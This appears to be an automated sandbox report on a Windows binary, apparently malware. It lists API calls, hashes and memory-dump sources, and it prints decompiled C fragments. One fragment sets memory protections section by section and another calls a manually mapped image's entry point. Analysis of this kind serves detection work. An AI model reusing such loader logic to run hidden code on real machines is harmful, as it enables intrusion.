                  • Opcode ID: f3d64f3f801d33a292605fdcbebf8d3cb2c3b97c59dbb3c92e5d11e93f781ed0
                  • Instruction ID: 118da92a0fe2c05c645e7ef8a25365bafb8652f7fe0600403f3970d475cfe508
                  • Opcode Fuzzy Hash: f3d64f3f801d33a292605fdcbebf8d3cb2c3b97c59dbb3c92e5d11e93f781ed0
                  • Instruction Fuzzy Hash: EB119073614301AFD701CF61CC49F8BB7ECAB44318F204999B505D72A0EBB4E5589B59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 7029D0D8: GetLastError.KERNEL32(00000000,00000000,00000004,70298D94,00000000,00000000,00000000,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D0DD
                    • Part of subcall function 7029D0D8: SetLastError.KERNEL32(00000000,702C0050,000000FF,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D17B
                  • _free.LIBCMT ref: 7029836E
                  • _free.LIBCMT ref: 7029839C
                  • _free.LIBCMT ref: 702983E4
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: _free$ErrorLast
                  • String ID:
                  • API String ID: 3291180501-0
                  • Opcode ID: b0ce34c5dcee3b7911124a184addfcf517c0455d1f17b1ba5e764711d445753a
                  • Instruction ID: 54a35108bcce7a0aff7a0b001e7b92a3d5c0db6e82a1710657d517c06e755d3a
                  • Opcode Fuzzy Hash: b0ce34c5dcee3b7911124a184addfcf517c0455d1f17b1ba5e764711d445753a
                  • Instruction Fuzzy Hash: BF417E726101069FD715CFACC881A6DB7F9EF49324B2805ADE516E72A1DB31FC209F98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: __cftoe$_free
                  • String ID:
                  • API String ID: 1303422935-0
                  • Opcode ID: 7b0598cff79fc6db5ea274ccbea5fec3ba90d6f1abb7da1e1d8e8871c145494d
                  • Instruction ID: 9e3e6c8109071bdf8002cd50afe26f03da1785a8f52b6f9b36cb91962cd80fa6
                  • Opcode Fuzzy Hash: 7b0598cff79fc6db5ea274ccbea5fec3ba90d6f1abb7da1e1d8e8871c145494d
                  • Instruction Fuzzy Hash: B321E5B781410A7EDF109F95DC01EDE3BBCDF85260F24412BF916F5090EE30DA208A59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • __RTC_Initialize.LIBCMT ref: 70293D4C
                    • Part of subcall function 70294348: RtlInitializeSListHead.NTDLL(702C0D48), ref: 7029434D
                  • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 70293DB6
                  • ___scrt_fastfail.LIBCMT ref: 70293E00
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: Initialize$HeadList___scrt_fastfail___scrt_is_nonwritable_in_current_image
                  • String ID:
                  • API String ID: 2097537958-0
                  • Opcode ID: 7e05a9bd5963a2b877d26c993b409b1994d7042af6d1d2263cfd8a7b899084c6
                  • Instruction ID: 9c3b4f53563ac562f7092b7e2d1c365991116c05acb2038bba71e29875f6c049
                  • Opcode Fuzzy Hash: 7e05a9bd5963a2b877d26c993b409b1994d7042af6d1d2263cfd8a7b899084c6
                  • Instruction Fuzzy Hash: 172105776682069EDB10AFB48816B9D3BB59F02329F200659EC877B1C1CF612530CA7D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 78%
                  			E70251F74(void* __eax, long __edx, void* _a4) {
                  				signed int _v8;
                  				signed int _v12;
                  				long _v16;
                  				signed int _v20;
                  				int _t33;
                  				signed int _t36;
                  				long _t41;
                  				void* _t50;
                  				void* _t51;
                  				signed int _t54;
                  
                  				_t41 = __edx;
                  				_v12 = _v12 & 0x00000000;
                  				_t36 =  *(__eax + 6) & 0x0000ffff;
                  				_t50 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                  				_v20 = _t36;
                  				VirtualProtect(_a4,  *(__eax + 0x54), 4,  &_v16); // executed
                  				_v8 = _v8 & 0x00000000;
                  				if(_t36 <= 0) {
                  					L11:
                  					return _v12;
                  				}
                  				_t51 = _t50 + 0x24;
                  				while(1) {
                  					_t54 = _v12;
                  					if(_t54 != 0) {
                  						goto L11;
                  					}
                  					asm("bt dword [esi], 0x1d");
                  					if(_t54 >= 0) {
                  						asm("bt dword [esi], 0x1e");
                  						if(__eflags >= 0) {
                  							_t41 = 4;
                  						} else {
                  							asm("bt dword [esi], 0x1f");
                  							asm("sbb edx, edx");
                  							_t41 = ( ~(_t41 & 0xffffff00 | __eflags > 0x00000000) & 0x00000002) + 2;
                  						}
                  					} else {
                  						asm("bt dword [esi], 0x1f");
                  						asm("sbb edx, edx");
                  						_t41 = ( ~(_t41 & 0xffffff00 | _t54 > 0x00000000) & 0x00000020) + 0x20;
                  					}
                  					_t33 = VirtualProtect( *((intOrPtr*)(_t51 - 0x18)) + _a4,  *(_t51 - 0x1c), _t41,  &_v16); // executed
                  					if(_t33 == 0) {
                  						_v12 = GetLastError();
                  					}
                  					_t51 = _t51 + 0x28;
                  					_v8 = _v8 + 1;
                  					if(_v8 < _v20) {
                  						continue;
                  					} else {
                  						goto L11;
                  					}
                  				}
                  				goto L11;
                  			}

                  APIs
                  • VirtualProtect.KERNELBASE(00000000,?,00000004,00000002,?,00000002,00000000,?,00000002), ref: 70251FA2
                  • VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 70251FF9
                  • GetLastError.KERNEL32(?,?), ref: 70251FFF
                  Memory Dump Source
                  • Source File: 00000014.00000002.473300210.0000000070251000.00000020.00020000.sdmp, Offset: 70250000, based on PE: true
                  • Associated: 00000014.00000002.473286168.0000000070250000.00000002.00020000.sdmp
                  • Associated: 00000014.00000002.473313989.0000000070253000.00000002.00020000.sdmp
                  • Associated: 00000014.00000002.473328379.0000000070255000.00000004.00020000.sdmp
                  • Associated: 00000014.00000002.473359976.0000000070256000.00000002.00020000.sdmp
                  Similarity
                  • API ID: ProtectVirtual$ErrorLast
                  • String ID:
                  • API String ID: 1469625949-0
                  • Opcode ID: 363e2658eb37bce25f984c1b35f73e48921b6e95d2716b33bb19488e7bfd83dd
                  • Instruction ID: 7b71d73e86d3a9611a83c59908d7d74cc422e26fa40ef5e6b32d43c3844109e1
                  • Opcode Fuzzy Hash: 363e2658eb37bce25f984c1b35f73e48921b6e95d2716b33bb19488e7bfd83dd
                  • Instruction Fuzzy Hash: B0210273A00209EFDB108F88CC80FADF7FAFB84314F208188E50056241D3349A8DDB54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 28%
                  			E00DC5311(void* __ecx, signed char* _a4) {
                  				signed int _v8;
                  				void* _v12;
                  				void* _t13;
                  				signed short _t16;
                  				signed int _t17;
                  				void* _t19;
                  				intOrPtr _t20;
                  				void* _t22;
                  				void* _t23;
                  				signed short* _t26;
                  				void* _t27;
                  				intOrPtr* _t28;
                  				void* _t30;
                  				intOrPtr* _t31;
                  
                  				_t31 = __imp__;
                  				_t23 = 0;
                  				_v8 = 1;
                  				_t28 = 0xdcd2e0;
                  				 *_t31(0, _t27, _t30, _t22, __ecx, __ecx);
                  				while(1) {
                  					_t13 = E00DC3512(_a4,  &_v12); // executed
                  					if(_t13 == 0) {
                  						break;
                  					}
                  					_push(_v12);
                  					_t19 = 0xd;
                  					_t20 = E00DC745D(_t19);
                  					if(_t20 == 0) {
                  						HeapFree( *0xdcd1f0, 0, _v12);
                  						break;
                  					} else {
                  						 *_t28 = _t20;
                  						_t28 = _t28 + 4;
                  						_t23 = _t23 + 1;
                  						if(_t23 < 3) {
                  							continue;
                  						} else {
                  						}
                  					}
                  					L7:
                  					 *_t31(1);
                  					if(_v8 != 0) {
                  						_t26 =  *0xdcd2e8; // 0x5119bf0
                  						_t16 =  *_t26 & 0x0000ffff;
                  						if(_t16 < 0x61 || _t16 > 0x7a) {
                  							_t17 = _t16 & 0x0000ffff;
                  						} else {
                  							_t17 = (_t16 & 0x0000ffff) - 0x20;
                  						}
                  						 *_t26 = _t17;
                  					}
                  					return _v8;
                  				}
                  				_v8 = _v8 & 0x00000000;
                  				goto L7;
                  			}

                  APIs
                  • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00DC532E
                    • Part of subcall function 00DC3512: RtlAllocateHeap.NTDLL(00000000,63699BC3,00DCD2E0), ref: 00DC353D
                    • Part of subcall function 00DC3512: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00DC355F
                    • Part of subcall function 00DC3512: memset.NTDLL ref: 00DC3579
                    • Part of subcall function 00DC3512: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 00DC35B7
                    • Part of subcall function 00DC3512: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00DC35CB
                    • Part of subcall function 00DC3512: CloseHandle.KERNEL32(?), ref: 00DC35E2
                    • Part of subcall function 00DC3512: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 00DC35EE
                    • Part of subcall function 00DC3512: lstrcat.KERNEL32(?,642E2A5C), ref: 00DC362F
                    • Part of subcall function 00DC3512: FindFirstFileA.KERNELBASE(?,?), ref: 00DC3645
                  • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00DC5373
                    • Part of subcall function 00DC745D: lstrlen.KERNEL32(?,00DCD2E0,74B47FC0,00000000,00DC534B,?,?,?,?,?,00DC70B5,?), ref: 00DC7466
                    • Part of subcall function 00DC745D: mbstowcs.NTDLL ref: 00DC748D
                    • Part of subcall function 00DC745D: memset.NTDLL ref: 00DC749F
                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,00DC70B5,?), ref: 00DC5367
                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: Wow64$FileHeap$AllocateEnableRedirectionmemset$CloseCreateFindFirstFreeHandleTimelstrcatlstrlenmbstowcs
                  • String ID:
                  • API String ID: 94831996-0
                  • Opcode ID: b19132ca9190e7cc1d50cac23ec6741edc05fb877255465e9b31cbafcdd69ddc
                  • Instruction ID: dc89762a7e5d19a1fc48eaf12b41a4f3d5ff27e3ecbfb169e7b6dc2942e776d6
                  • Opcode Fuzzy Hash: b19132ca9190e7cc1d50cac23ec6741edc05fb877255465e9b31cbafcdd69ddc
                  • Instruction Fuzzy Hash: BE110875510347EEDB008B95EC44FACB7A5FB41394F14002AE541D7194C2B5AD82AB74
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00DC76D6(void* __ecx, void* __eflags) {
                  				char _v8;
                  				void* _v12;
                  				int _v16;
                  				int _v20;
                  				intOrPtr _t15;
                  				intOrPtr _t19;
                  				long _t24;
                  				long _t29;
                  				short* _t31;
                  				short* _t34;
                  
                  				_t15 =  *0xdcd230; // 0x434a5a8
                  				_v8 = _v8 & 0x00000000;
                  				_t3 = _t15 + 0xdcea60; // 0x4f0053
                  				_v16 = 4;
                  				_t31 = E00DC7404(__ecx, _t3);
                  				if(_t31 != 0) {
                  					_t19 =  *0xdcd230; // 0x434a5a8
                  					_t5 = _t19 + 0xdceabc; // 0x6e0049
                  					_t34 = E00DC7404(__ecx, _t5);
                  					if(_t34 != 0) {
                  						_t24 = RegOpenKeyExW(0x80000002, _t31, 0, 0x20119,  &_v12); // executed
                  						if(_t24 == 0) {
                  							_t29 = RegQueryValueExW(_v12, _t34, 0,  &_v20,  &_v8,  &_v16); // executed
                  							if(_t29 != 0) {
                  								_v8 = _v8 & 0x00000000;
                  							}
                  							RegCloseKey(_v12);
                  						}
                  						E00DC4C31(_t34);
                  					}
                  					E00DC4C31(_t31);
                  				}
                  				return _v8;
                  			}

                  APIs
                    • Part of subcall function 00DC7404: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00DC76F9,004F0053,00000000,?), ref: 00DC740D
                    • Part of subcall function 00DC7404: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00DC76F9,004F0053,00000000,?), ref: 00DC7437
                    • Part of subcall function 00DC7404: memset.NTDLL ref: 00DC744B
                  • RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,00000000,006E0049,?,004F0053,00000000,?), ref: 00DC7728
                  • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000004,00000000,00000004), ref: 00DC7744
                  • RegCloseKey.ADVAPI32(00000000), ref: 00DC7755
                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: CloseOpenQueryValuelstrlenmemcpymemset
                  • String ID:
                  • API String ID: 830012212-0
                  • Opcode ID: a0526893eb15a4246304535d340d5a25f176f38ca9b5d93dfc7c3611141db337
                  • Instruction ID: 44f2727e1bda99a49a77f5d822fed26d2a6f10aba66317d0c08282263cad6e11
                  • Opcode Fuzzy Hash: a0526893eb15a4246304535d340d5a25f176f38ca9b5d93dfc7c3611141db337
                  • Instruction Fuzzy Hash: 7911F7B250420BAFDB11DBD9DD85FAEB7BCAB44700F1800A9B601E7191DB74DA059B34
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			_entry_(intOrPtr _a4, intOrPtr _a8) {
                  				intOrPtr _t4;
                  				void* _t10;
                  				signed int _t11;
                  				void* _t13;
                  
                  				_t13 = 1;
                  				_t4 = _a8;
                  				if(_t4 == 0) {
                  					if(InterlockedDecrement( &E00DCD1F4) == 0) {
                  						E00DC310C();
                  					}
                  				} else {
                  					if(_t4 == 1 && InterlockedIncrement( &E00DCD1F4) == 1) {
                  						_t10 = E00DC8714(_t11, _a4); // executed
                  						if(_t10 != 0) {
                  							_t13 = 0;
                  						}
                  					}
                  				}
                  				return _t13;
                  			}

                  APIs
                  • InterlockedIncrement.KERNEL32(00DCD1F4), ref: 00DCA5E6
                    • Part of subcall function 00DC8714: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 00DC8729
                  • InterlockedDecrement.KERNEL32(00DCD1F4), ref: 00DCA606
                  Memory Dump Source
                  • Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true
                  • Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp
                  • Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp
                  • Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: Interlocked$CreateDecrementHeapIncrement
                  • String ID:
                  • API String ID: 3834848776-0
                  • Opcode ID: a1547f005b2b2608b5c035a65c6c01f72f82bf9a0cc263d410fd1b3133e1ae25
                  • Instruction ID: bb307fba82f86dcabe35e42cb5af91bed4298bec9e3f2a103182c87d27a604cb
                  • Opcode Fuzzy Hash: a1547f005b2b2608b5c035a65c6c01f72f82bf9a0cc263d410fd1b3133e1ae25
                  • Instruction Fuzzy Hash: D1E04F2128462B9F862127AD8C08F6AFE519B10B8CB0C612CF745D3051E610CC9097B7
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • IsValidLocaleName.KERNELBASE(?,7029E4DF,?,00000055,?,-00000050,?,?,00000004), ref: 7029DA32
                  • IsValidLocale.KERNEL32(00000000,?,00000000,00000001,?,?,7029E4DF,?,00000055,?,-00000050,?,?,00000004), ref: 7029DA43
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: LocaleValid$Name
                  • String ID:
                  • API String ID: 1113214789-0
                  • Opcode ID: 394313960919f03a92cc9bdbf3d2deb77ba9cb009cae05ecb1704495e9f31738
                  • Instruction ID: 88d7d71ca8933434c01e61e09bced63f4e1514c8110f44f14e1a53f766a08a1a
                  • Opcode Fuzzy Hash: 394313960919f03a92cc9bdbf3d2deb77ba9cb009cae05ecb1704495e9f31738
                  • Instruction Fuzzy Hash: 46E08C33524224ABCA222B628C0DB8E7E199B40790F100021B90676150CE61D832AAD8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 83%
                  			E70252020(void* __ecx) {
                  				void* _v8;
                  				char _v12;
                  				char* _t18;
                  				char* _t25;
                  				char* _t29;
                  
                  				_t22 = __ecx;
                  				_push(__ecx);
                  				_push(__ecx);
                  				_t25 = 0;
                  				if(E702517C2( &_v8,  &_v12,  *0x7025414c ^ 0x196db149) != 0) {
                  					if(_v8 == 0) {
                  						_t29 = 0;
                  					} else {
                  						_t29 = E7025157D(_t22, _v8,  *0x7025414c ^ 0x6e49bbff);
                  					}
                  					if(_t29 != 0) {
                  						_v12 = E7025111B(_t22) & 0x0000ffff;
                  						_t18 = StrStrIA(_t29,  &_v12); // executed
                  						if(_t18 != 0) {
                  							_t25 = 0x657;
                  						}
                  					}
                  					HeapFree( *0x70254110, 0, _v8);
                  				}
                  				return _t25;
                  			}

                  APIs
                  • StrStrIA.KERNELBASE(00000000,?,?,?,?,00000000,00000000,?,?,?,702511D6), ref: 70252077
                  • HeapFree.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,?,?,702511D6), ref: 70252091
                  Memory Dump Source
                  • Source File: 00000014.00000002.473300210.0000000070251000.00000020.00020000.sdmp, Offset: 70250000, based on PE: true
                  • Associated: 00000014.00000002.473286168.0000000070250000.00000002.00020000.sdmp
                  • Associated: 00000014.00000002.473313989.0000000070253000.00000002.00020000.sdmp
                  • Associated: 00000014.00000002.473328379.0000000070255000.00000004.00020000.sdmp
                  • Associated: 00000014.00000002.473359976.0000000070256000.00000002.00020000.sdmp
                  Similarity
                  • API ID: FreeHeap
                  • String ID:
                  • API String ID: 3298025750-0
                  • Opcode ID: 5b4ad28c2cfe9a056ebeb6971a89c352b2021b8a4025a6ac743207ccde0eaa0d
                  • Instruction ID: 4aac1600a2ee7e5c4fe4b862054cc6022ce5c75943791724378d01a8dd8e325e
                  • Opcode Fuzzy Hash: 5b4ad28c2cfe9a056ebeb6971a89c352b2021b8a4025a6ac743207ccde0eaa0d
                  • Instruction Fuzzy Hash: 0401D477A01215BFCB018FA2CD44F9FBBBCAB95640F2100D5B902E3180D630DA18EBA8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • VirtualProtectEx.KERNELBASE(000000FF,?,702C0918,702C0944,702C1B60,?), ref: 7028F442
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: ProtectVirtual
                  • String ID:
                  • API String ID: 544645111-0
                  • Opcode ID: 3cb64cf31ed4407cf33835cc968d3ab81aac5dc4d7f068972e91582f169e3590
                  • Instruction ID: 09419b6083e98d2da7d22a3bd03bd8a4ceaf493cceaac77bee4588928909f59d
                  • Opcode Fuzzy Hash: 3cb64cf31ed4407cf33835cc968d3ab81aac5dc4d7f068972e91582f169e3590
                  • Instruction Fuzzy Hash: BC914A77A02245DFD749CFAAC9D8B6EBBB2FB98300F208259D441D73A5D3345A40EB90
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 7029C672: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 7029C6B3
                  • _free.LIBCMT ref: 702A6D11
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: AllocateHeap_free
                  • String ID:
                  • API String ID: 614378929-0
                  • Opcode ID: 44dd9ba930deb4f99e748e46f71780d5b418487e0580e040bd0d27dcf69e28f5
                  • Instruction ID: 4850a16a508112629ae23acad81c6c3595c31c5fcd8335ce49f9cfcf34804309
                  • Opcode Fuzzy Hash: 44dd9ba930deb4f99e748e46f71780d5b418487e0580e040bd0d27dcf69e28f5
                  • Instruction Fuzzy Hash: 0601FEB36043169FC3218F58C48598DFB9DEB453B0F110629E556B76C0DB706D24CBA8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 7029C672: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 7029C6B3
                  • _free.LIBCMT ref: 7029DEBB
                    • Part of subcall function 7029C6CF: HeapFree.KERNEL32(00000000,00000000,?,7029A4F1), ref: 7029C6E5
                    • Part of subcall function 7029C6CF: GetLastError.KERNEL32(?,?,7029A4F1), ref: 7029C6F7
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: Heap$AllocateErrorFreeLast_free
                  • String ID:
                  • API String ID: 314386986-0
                  • Opcode ID: 23c9956c058ca3540ffba92d896f040b0d6f67a41798eeaeb4e8479166d7f937
                  • Instruction ID: edb1629c97fe4fa914f5db6c480f25c055536ed57958e613343349dd4c1fdbd0
                  • Opcode Fuzzy Hash: 23c9956c058ca3540ffba92d896f040b0d6f67a41798eeaeb4e8479166d7f937
                  • Instruction Fuzzy Hash: F80108B6D00219AFCB10CFA9C841B9EBBB8FB48710F104166EA15E7240E770AA54CFD4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 7029C6B3
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: 922e35e65946b4c782fee1981499c218e0b9b676704d0b8cf0bee7ac34a46f63
                  • Instruction ID: 2cb0c5baf4e3b05371900c69f1ce9386817ee670e782348e1619572b48023a22
                  • Opcode Fuzzy Hash: 922e35e65946b4c782fee1981499c218e0b9b676704d0b8cf0bee7ac34a46f63
                  • Instruction Fuzzy Hash: 71F0B4336252266ADB115E66CD05B4F376C9FC1670B31A02AEC07B61B4CA20E8204EA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 85%
                  			E702516C3(void* __eax, void* __edx) {
                  				char _v8;
                  				void* _v12;
                  				void* _t17;
                  				long _t23;
                  				long _t25;
                  				long _t28;
                  				void* _t31;
                  				intOrPtr* _t34;
                  				void* _t35;
                  				intOrPtr* _t36;
                  				intOrPtr _t38;
                  
                  				_t31 = __edx;
                  				_t35 = __eax;
                  				_t17 = E70251A07( &_v8,  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) + 0x00000fff & 0xfffff000,  &_v8,  &_v12); // executed
                  				if(_t17 != 0) {
                  					_t28 = 8;
                  					goto L8;
                  				} else {
                  					_t34 = _v8;
                  					_t28 = E70251B1D( &_v8, _t34, _t35);
                  					if(_t28 == 0) {
                  						_t38 =  *((intOrPtr*)(_t34 + 0x3c)) + _t34;
                  						_t23 = E702512D5(_t34, _t38); // executed
                  						_t28 = _t23;
                  						if(_t28 == 0) {
                  							_t25 = E70251F74(_t38, _t31, _t34); // executed
                  							_t28 = _t25;
                  							if(_t28 == 0) {
                  								_push(_t25);
                  								_push(1);
                  								_push(_t34);
                  								if( *((intOrPtr*)( *((intOrPtr*)(_t38 + 0x28)) + _t34))() == 0) {
                  									_t28 = GetLastError();
                  								}
                  							}
                  						}
                  					}
                  					_t36 = _v12;
                  					 *((intOrPtr*)(_t36 + 0x18))( *((intOrPtr*)(_t36 + 0x1c))( *_t36));
                  					E702515C4(_t36);
                  					L8:
                  					return _t28;
                  				}
                  			}

                  APIs
                    • Part of subcall function 70251A07: GetModuleHandleA.KERNEL32(?,00000020,00000002,0000000A,?,?,?,?,702516ED,?,?,?,00000002,?,?,?), ref: 70251A2C
                    • Part of subcall function 70251A07: GetProcAddress.KERNEL32(00000000,?), ref: 70251A4E
                    • Part of subcall function 70251A07: GetProcAddress.KERNEL32(00000000,?), ref: 70251A64
                    • Part of subcall function 70251A07: GetProcAddress.KERNEL32(00000000,?), ref: 70251A7A
                    • Part of subcall function 70251A07: GetProcAddress.KERNEL32(00000000,?), ref: 70251A90
                    • Part of subcall function 70251A07: GetProcAddress.KERNEL32(00000000,?), ref: 70251AA6
                    • Part of subcall function 70251B1D: memcpy.NTDLL(?,00000002,702516FB,?,0000000A,?,?,?,702516FB,?,0000000A,?,?,?,00000002), ref: 70251B4A
                    • Part of subcall function 70251B1D: memcpy.NTDLL(?,00000002,?,00000002,?,?,?,?), ref: 70251B7D
                    • Part of subcall function 702512D5: LoadLibraryA.KERNELBASE(00000002,00000002,?,00000000,?,?,00000002), ref: 7025130B
                    • Part of subcall function 702512D5: lstrlenA.KERNEL32(00000002), ref: 70251321
                    • Part of subcall function 702512D5: memset.NTDLL ref: 7025132B
                    • Part of subcall function 702512D5: GetProcAddress.KERNEL32(?,00000002), ref: 7025138E
                    • Part of subcall function 702512D5: lstrlenA.KERNEL32(-00000002), ref: 702513A3
                    • Part of subcall function 702512D5: memset.NTDLL ref: 702513AD
                    • Part of subcall function 70251F74: VirtualProtect.KERNELBASE(00000000,?,00000004,00000002,?,00000002,00000000,?,00000002), ref: 70251FA2
                    • Part of subcall function 70251F74: VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 70251FF9
                    • Part of subcall function 70251F74: GetLastError.KERNEL32(?,?), ref: 70251FFF
                  • GetLastError.KERNEL32(?,?,?,?), ref: 70251730
                  Memory Dump Source
                  • Source File: 00000014.00000002.473300210.0000000070251000.00000020.00020000.sdmp, Offset: 70250000, based on PE: true
                  • Associated: 00000014.00000002.473286168.0000000070250000.00000002.00020000.sdmp
                  • Associated: 00000014.00000002.473313989.0000000070253000.00000002.00020000.sdmp
                  • Associated: 00000014.00000002.473328379.0000000070255000.00000004.00020000.sdmp
                  • Associated: 00000014.00000002.473359976.0000000070256000.00000002.00020000.sdmp
                  Similarity
                  • API ID: AddressProc$ErrorLastProtectVirtuallstrlenmemcpymemset$HandleLibraryLoadModule
                  • String ID:
                  • API String ID: 33504255-0
                  • Opcode ID: a3943949b74913ba6821ad51d2602250a7986f2029d3c2a90ea505299250dc63
                  • Instruction ID: 42da3a7c37eecf15f920a6dd2e5d1870f5b111fb77e5218c18ab679b89de0d11
                  • Opcode Fuzzy Hash: a3943949b74913ba6821ad51d2602250a7986f2029d3c2a90ea505299250dc63
                  • Instruction Fuzzy Hash: 7811C6377007126BD7125AAD8C85E9FB7FCAF49214B4001A8F901E7340EBB4FC198768
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?), ref: 702C21D6
                  Memory Dump Source
                  • Source File: 00000014.00000002.473752646.00000000702C1000.00000040.00020000.sdmp, Offset: 702C1000, based on PE: false
                  Similarity
                  • API ID: AllocVirtual
                  • String ID:
                  • API String ID: 4275171209-0
                  • Opcode ID: 7a29d108586aff7e067c09f4ec5a85883207dfaed275dae7e02901baf4074659
                  • Instruction ID: d2ad9aae15b4fc13e01a02c7546be1d0046266737c15b4f8ed9fa99d4dd6a60c
                  • Opcode Fuzzy Hash: 7a29d108586aff7e067c09f4ec5a85883207dfaed275dae7e02901baf4074659
                  • Instruction Fuzzy Hash: 1BE08632144100BFEB04CF94CC95F927B95EBE5710F180098ED08AF3C9DBB035108664
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions

                  APIs
                  • GetLocaleInfoW.KERNEL32(?,2000000B,gV*p,00000002,00000000,?,?,?,702A5667,?,00000000), ref: 702A53E2
                  • GetLocaleInfoW.KERNEL32(?,20001004,gV*p,00000002,00000000,?,?,?,702A5667,?,00000000), ref: 702A540B
                  • GetACP.KERNEL32(?,?,702A5667,?,00000000), ref: 702A5420
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false
                  Similarity
                  • API ID: InfoLocale
                  • String ID: ACP$OCP$gV*p
                  • API String ID: 2299586839-3046050243
                  • Opcode ID: 27c6a05eaa8be87064fd223c38283d1b9c8358608895a653041e3d01f44f5134
                  • Instruction ID: 0313a4e469eacd0180566e4ec9b56b7b7a3934935939007b70fc24ab558b0f81
                  • Opcode Fuzzy Hash: 27c6a05eaa8be87064fd223c38283d1b9c8358608895a653041e3d01f44f5134
                  • Instruction Fuzzy Hash: 5F2153E3610122AADB258F15C905A8F73B7EB84B91B5284A4ED07DB104EF72DDA5C750
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                    • Part of subcall function 7029D0D8: GetLastError.KERNEL32(00000000,00000000,00000004,70298D94,00000000,00000000,00000000,?,7029C932,00000000,00000000,702C0004,?,00000000), ref: 7029D0DD
